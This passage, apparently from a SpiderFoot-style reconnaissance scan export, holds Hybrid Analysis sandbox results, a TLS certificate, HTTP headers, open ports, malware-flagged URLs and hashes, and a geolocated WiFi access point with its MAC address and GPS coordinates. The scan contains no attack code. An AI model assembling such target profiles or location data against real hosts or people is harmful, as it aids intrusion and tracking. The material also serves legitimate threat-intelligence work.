"\\Sessions\\1\\BaseNamedObjects\\SM0:2100:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:2100:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "104.18.11.207:443"\n "104.17.25.14:443"\n "69.16.175.10:443"\n "142.250.191.74:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': 
u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"code.jquery.com"\n "maxcdn.bootstrapcdn.com"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00002100]\n "bcd4e478c907a1db_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\bcd4e478c907a1db_0]- [targetUID: 00000000-00002100]\n "2723a038-a290-4c43-bb8c-08ee81821f60.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "f3b3874d-b7fd-4743-86c6-8a859ff983dd.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\f3b3874d-b7fd-4743-86c6-8a859ff983dd.tmp]- [targetUID: 00000000-00002100]\n "regex_patterns.json" has type "JSON data"- Location: [%TEMP%\\2100_1335449342\\regex_patterns.json]- [targetUID: 00000000-00002100]\n "Session_13324548215740340" has type "data"- [targetUID: N/A]\n "ef0b503b-889d-4eff-b1c3-91558919ec3f.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ef0b503b-889d-4eff-b1c3-91558919ec3f.tmp]- [targetUID: 00000000-00002100]\n "b72ee2e9-deac-4a09-bd9f-b4338b5164a2.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: 
[%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\b72ee2e9-deac-4a09-bd9f-b4338b5164a2.tmp]- [targetUID: 00000000-00002100]\n "LICENSE" has type "ASCII text with CRLF line terminators"- Location: [%TEMP%\\2100_586202141\\LICENSE]- [targetUID: 00000000-00002100]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00007100]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00002100]\n "manifest.json" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\hyphen-data\\101.0.4906.0\\manifest.json]- [targetUID: 00000000-00002100]\n "deny_domains.list" has type "data"- Location: [%TEMP%\\2100_2088247416\\deny_domains.list]- [targetUID: 00000000-00002100]\n "temp-index" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\index-dir\\temp-index]- [targetUID: 00000000-00002100]\n "9d9ecc22ec9f384e_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\9d9ecc22ec9f384e_0]- [targetUID: 00000000-00002100]\n "ec01fe90-50b0-43d5-bfc3-bcc31d8c1af8.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\ec01fe90-50b0-43d5-bfc3-bcc31d8c1af8.tmp]- [targetUID: 00000000-00002100]\n "edge_tracking_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2100_1931342577\\edge_tracking_page_validator.js]- [targetUID: 00000000-00002100]\n "edge_autofill_global_block_list.json" has type "JSON data"- Location: [%TEMP%\\2100_1335449342\\edge_autofill_global_block_list.json]- [targetUID: 00000000-00002100]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User 
Data\\Default\\EdgeCoupons\\coupons_data.db\\LOG]- [targetUID: 00000000-00002100]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Potential IP "3.0.0.8" found in string ""version": "3.0.0.8""\n Potential IP "3.0.0.8" found in string "\xef\xbb\xbf{ "description": "AutofillCore data component", "name": "AutofillCore", "version": "3.0.0.8"}"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.rundll32,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\WINDOWS\\system32\\RunDll32.exe"\n "192.168.241.233"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.InetCore.ieframe,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\Windows\\System32\\ieframe.dll"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.shell32,processorArchitecture="*",type="win32",version="5.1.0.0"C:\\WINDOWS\\WindowsShell.Manifest"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.shell32,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\WINDOWS\\System32\\SHELL32.dll"\n Potential IP "5.1.0.0" found in string "version="5.1.0.0""'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://easylist.to/"\n Pattern match: "https://github.com/easylist"\n Pattern match: "https://kutumin.github.io/OSCP-notes/1.html"\n Pattern match: ".github.io/_:__J__-1ct_;./1"\n Heuristic match: "code.jquery.com"\n Pattern match: "https://creativecommons.org/"\n Pattern match: 
"https://kutumin.github.io"\n Heuristic match: "ku_umin.gi_hub.io"\n Pattern match: "https://creativecommons.org/compatiblelicenses"\n Heuristic match: "maxcdn.bootstrapcdn.com"\n Pattern match: "https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wtc3?ver=79e5,PORTRAIT:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqHh?ver=0f07,copyright:Yuanping"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "kutumin.github.io/OSCP-notes/1.html"\n Heuristic match: "utumin.github.io"\n Heuristic match: "PATHEXT=.COM;.EXE;.BAT;.CM"\n Pattern match: "http://schemas.microsoft.com/SMI/2005/WindowsSettings"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-40', u'name': u'Drops script (vb/js) files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 1, u'type': 8, u'description': u'"edge_tracking_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2100_1931342577\\edge_tracking_page_validator.js]- [targetUID: 00000000-00002100]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2100_1931342577\\product_page.js]- [targetUID: 00000000-00002100]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2100_1931342577\\auto_open_controller.js]- [targetUID: 00000000-00002100]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: 
[%TEMP%\\2100_1931342577\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00002100]\n "adblock_snippet.js" has type "ASCII text with very long lines with no line terminators"- Location: [%TEMP%\\2100_586202141\\adblock_snippet.js]- [targetUID: 00000000-00002100]\n "shopping_iframe_driver.js" has type "Unknown"- Location: [%TEMP%\\2100_1931342577\\shopping_iframe_driver.js]- [targetUID: 00000000-00002100]\n "edge_driver.js" has type | 185.199.111.153 |
| 2023-05-12 03:09:28 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:2b:20:f1:49:ce:17:59:bc:7b:39:e2:e2:fa:42:b1:cb:0c
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Apr 15 16:29:54 2023 GMT
Not After : Jul 14 16:29:53 2023 GMT
Subject: CN=acilacikveteriner.com
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:c7:ba:9d:2f:ad:0e:f2:f8:9e:5c:47:bb:79:38:
f3:7c:d2:03:58:1b:12:06:b4:9c:86:5f:4c:31:08:
97:33:13:16:be:48:6a:55:ee:4e:d6:c5:23:53:75:
a1:48:d1:dc:60:03:c5:b4:9c:18:71:b4:c9:f7:cc:
d7:82:08:84:1d:47:f4:36:9b:65:58:31:ff:ed:94:
b6:e5:56:64:9c:67:0e:0c:de:2b:30:a2:07:ee:75:
47:c5:5f:11:d1:53:0e:8f:da:28:98:3b:38:2e:08:
69:6c:c4:64:ae:8f:c9:f5:19:80:d1:e7:ec:e9:1f:
1b:7f:31:13:13:d9:ca:c5:a0:e4:2d:d1:eb:64:92:
d6:2e:01:58:b8:f4:94:e5:87:37:22:41:1e:89:09:
32:89:e2:e9:ab:65:e1:e9:bd:3a:78:34:71:5a:05:
bd:11:66:12:e7:3d:c0:6e:5c:a0:5b:7c:2f:ea:d3:
59:67:84:e5:94:8d:5d:c2:5d:0b:e9:31:10:a1:3e:
fb:93:69:45:39:5a:bc:0b:ca:b1:2f:22:98:eb:71:
ac:2c:8d:4c:d2:d8:e4:67:1e:91:f0:df:67:09:d3:
65:de:99:92:1f:00:6b:5a:51:7a:ea:61:bf:c6:25:
13:a2:d4:3f:ce:87:f5:99:96:3f:8d:32:cf:33:8d:
7d:cf
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
36:05:AF:4D:AA:A6:E5:D2:C1:C1:21:FE:0A:C4:94:94:AD:20:CD:9B
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.acilacikveteriner.com, DNS:acilacikveteriner.com
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Apr 15 17:29:54.589 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:32:B4:07:60:D0:7B:AD:A1:AA:39:A0:33:
2C:4B:E1:77:83:1E:CE:A9:33:24:C8:65:7F:DF:53:65:
4B:41:42:18:02:21:00:FD:74:81:46:18:34:69:3F:14:
99:39:D8:31:BD:1B:5A:70:F3:78:90:AF:AD:75:83:08:
C2:10:05:66:CF:28:68
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Apr 15 17:29:54.608 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:A2:44:92:76:0B:30:A4:08:87:F8:F5:
33:F4:63:45:0C:49:83:2B:1A:52:DE:63:4A:85:9F:D2:
1A:1A:B8:B4:91:02:20:54:D8:11:BC:56:5E:73:20:60:
D4:CE:A7:0A:61:CF:DB:E2:3D:EE:A9:90:BC:A7:2E:FB:
55:B1:EE:11:E5:C7:45
Signature Algorithm: sha256WithRSAEncryption
3e:ae:14:0f:9c:c5:e0:11:98:98:31:9d:f3:e1:b4:c7:8a:a4:
f3:58:c9:e0:a4:05:56:d1:f9:d0:a4:d6:04:9d:0b:f6:b3:35:
fc:d2:7d:b4:11:05:af:75:bb:df:c2:14:e1:5b:2b:67:77:00:
e8:0a:22:8e:f1:5c:6b:dd:54:2d:32:81:db:7d:17:bf:9e:02:
e8:fe:8f:90:d6:80:45:fa:78:c9:ed:6a:db:0e:a3:ea:e8:74:
58:57:12:a1:5d:61:82:32:bc:ce:81:4f:81:b5:41:58:ef:85:
78:cc:7f:6f:ed:5a:0d:b0:9c:73:3f:51:f3:db:b8:4d:40:5f:
df:88:13:b9:16:5d:51:5b:41:71:f3:fe:f9:65:1f:10:70:47:
3b:59:bf:17:0d:cf:cb:71:fc:53:d1:09:8d:77:ea:5e:49:75:
b2:d9:dc:06:49:28:14:58:d2:5f:ea:d1:1b:59:2a:74:e1:24:
4f:0c:e0:62:0a:8a:6b:ea:fb:62:2f:01:c1:76:4f:99:ac:7b:
d1:5a:a4:72:e4:af:bc:0a:c2:6f:91:1c:dc:76:42:49:80:d2:
4b:b7:5c:cd:e2:11:b1:a4:78:34:c3:be:8f:27:49:28:8d:93:
b4:99:37:c8:78:d3:e9:55:fa:eb:2b:67:02:f6:c8:8c:50:e3:
a4:08:c1:b9
| 87.248.157.102 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 5 | 0 | None | cloudflare | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "REVALIDATED", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"79120efbf2a0b92da044ff91335c99c1\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=FXQU88yRDhEJMx%2FdYM%2F9ZMluhZXagjhG95IApBIpm7WqxobZm4CcFhtwU9d3QdUV9%2BbJoSdd48r6u2FX9%2FKZxhE4%2B1z8sAVQ0tKz2uiNE7MhIPsLxcBIQGzqQ1fObOLwdnHGyXAPA0tM\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f60483bb94334-EWR"} |
| 2023-05-12 02:53:52 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 2606:50c0:8003::153:80 | 2606:50c0:8003::153 |
| 2023-05-12 02:54:20 | HTTP Status Code | No | Web Spider | 0 | 0 | 2 | 0 | None | 200 | funny.battleb0t.xyz |
| 2023-05-12 02:57:17 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [u'34.196.254.27'], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://christitus.com/win', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"r3.o.lencr.org"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_4d4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_4d4_ConnHashTable<1236>_HashTable_Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "IsoScope_4d4_IESQMMUTEX_0_519"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_4d4_IESQMMUTEX_0_303"\n "IsoScope_4d4_IESQMMUTEX_0_331"\n "IsoScope_4d4_IE_EarlyTabStart_0xd68_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1236"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_4d4_ConnHashTable<1236>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"'}, {u'category': u'General', u'origin': 
u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.196.254.27:443"\n "23.62.46.138:80"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar3F6F.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar3F4E.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab3F6E.tmp" has type "Microsoft Cabinet archive data 61745 bytes 1 file"\n "Cab3F4D.tmp" has type "Microsoft Cabinet archive data 61745 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61745 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00001236]\n 
"77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002492]\n "GSA12G7R.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GSA12G7R.txt]- [targetUID: 00000000-00001236]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "3E324C193E3E3489256632ECA699B381" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\3E324C193E3E3489256632ECA699B381]- [targetUID: 00000000-00002492]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00001236]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00001236]\n "Cab3F6E.tmp" has type "Microsoft Cabinet archive data 61745 bytes 1 file"- Location: [%TEMP%\\Cab3F6E.tmp]- [targetUID: 00000000-00002492]\n "_9B5E0C66-351F-11ED-B467-080027B31D69_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6]- [targetUID: 00000000-00001236]\n "~DFC89EC8CB66FF456D.TMP" has type 
"data"- Location: [%TEMP%\\~DFC89EC8CB66FF456D.TMP]- [targetUID: 00000000-00001236]\n "dnserror_1_" has type "HTML document UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00001236]\n "Tar3F6F.tmp" has type "data"- Location: [%TEMP%\\Tar3F6F.tmp]- [targetUID: 00000000-00002492]\n "~DFB26C3774F79B80EF.TMP" has type "data"- Location: [%TEMP%\\~DFB26C3774F79B80EF.TMP]- [targetUID: 00000000-00001236]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://christitus.com/win"\n Pattern match: "https://christitus.com"\n Heuristic match: "r3.o.lencr.org"\n Heuristic match: "GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBRI2smg%2ByvTLU%2Fw3mjS9We3NfmzxAQUFC6zF7dYVsuuUAlA5h%2BvnYsUwsYCEgMTRy5Br8YJ%2BjNLl7XccZpG%2BQ%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: r3.o.lencr.org"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/88 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-21', u'name': u'Malicious artifacts seen in the context of a contacted host', u'attck_id_wiki': None, u'threat_level_human': 
u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found malicious artifacts related to "34.196.254.27": ...\n\n URL: http://princepatel.co.uk/ (AV positives: 1/88 scanned on 09/15/2022 19:19:34)\n URL: http://connect-collabland.live/ (AV positives: 12/89 scanned on 09/15/2022 18:28:12)\n URL: https://heartfelt-clafoutis-7b5e35.netlify.app/ (AV positives: 13/88 scanned on 09/15/2022 16:06:16)\n URL: http://goldownloads.netlify.app/ (AV positives: 7/88 scanned on 09/15/2022 13:39:21)\n URL: https://www.gaam.games/ (AV positives: 1/88 scanned on 09/15/2022 12:17:17)\n File SHA256: 9855d6610d262f5c5ac33a4824ce6d6aff9434181e2925d2e8502f55e0f4ccc2 (AV positives: 9/75 scanned on 09/13/2022 23:52:30)\n File SHA256: 6fbdf58ac0a20649648d8b3f171ad22b5a0f75015f17f61cd9b7097a86841671 (AV positives: 22/75 scanned on 09/10/2022 23:18:07)\n File SHA256: 10eb6a8b65dc19a76287d777aa59dd82975f4af0a30f3493a4c67e21c064d0ad (AV positives: 19/75 scanned on 09/08/2022 20:19:43)\n File SHA256: f82a3a4736145f2bd6f7de2482a3df3b50006c44845bd68cee0bac92f6100c00 (AV positives: 24/75 scanned on 09/06/2022 23:11:08)\n File SHA256: 6f9c9c07baf531f437439e7ca85d184ad2aa50ac0fc19ae7df1a0200ee6662c1 (AV positives: 16/75 scanned on 09/02/2022 23:37:08)'}], u'threat_level': 0, u'size': None, u'job_id': u'632382935a368c0d7b2bad4c', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [], u'certificates': [], u'hosts': [u'34.196.254.27', u'23.62.46.138'], u'sha256': u'7df1a40eceecc8b444d042c1ffe4058ab057ba7b8d9023392e6fb5997947e311', u'sha512': u'373b179c3f0b56cb7fa16d1138be944e3b5a120dbb942cbd85859deb0a07d565b2016c6019a13c085ebcb57ca7c526564a4cd532c98275eaca701178b34ce00c', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://christitus.com/win', u'submission_id': u'632382935a368c0d7b2bad4d', u'created_at': u'2022-09-15T19:52:51+00:00', 
u'filename': None}], u'analysis_start_time': u'2022-09-15T19:52:51+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 2, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 9, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'e9630d6e2a4b4c8bcd263913cf4f0e98', | 35.229.48.116 |
| 2023-05-12 02:54:13 | HTTP Headers | No | Web Spider | 10 | 0 | 4 | 0 | None | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=ZnKgqHhkfhEMG0RRLEy55qXrIGT89PCJPvhlAxU1THPzwDrL5gc7PkT%2B%2FxSKq2nR5SYE1oIsFspz8pOEUKsQOZN%2FSfuF%2FMxnliSNjDjXg8QSfRLZrnIM0lr2QA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f603759cec44a-EWR", "cross-origin-opener-policy": "same-origin"} | https://ayhu.xyz/?__cf_chl_f_tk=kwBAgL0pzuFjxM6EaWUvVvfmBnOG2dt8365xKG72N9g-1683860053-0-gaNycGzNCfs |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:9D:4C:90) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:01:23 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.216): Search Engine
Last Activity: 0 days ago
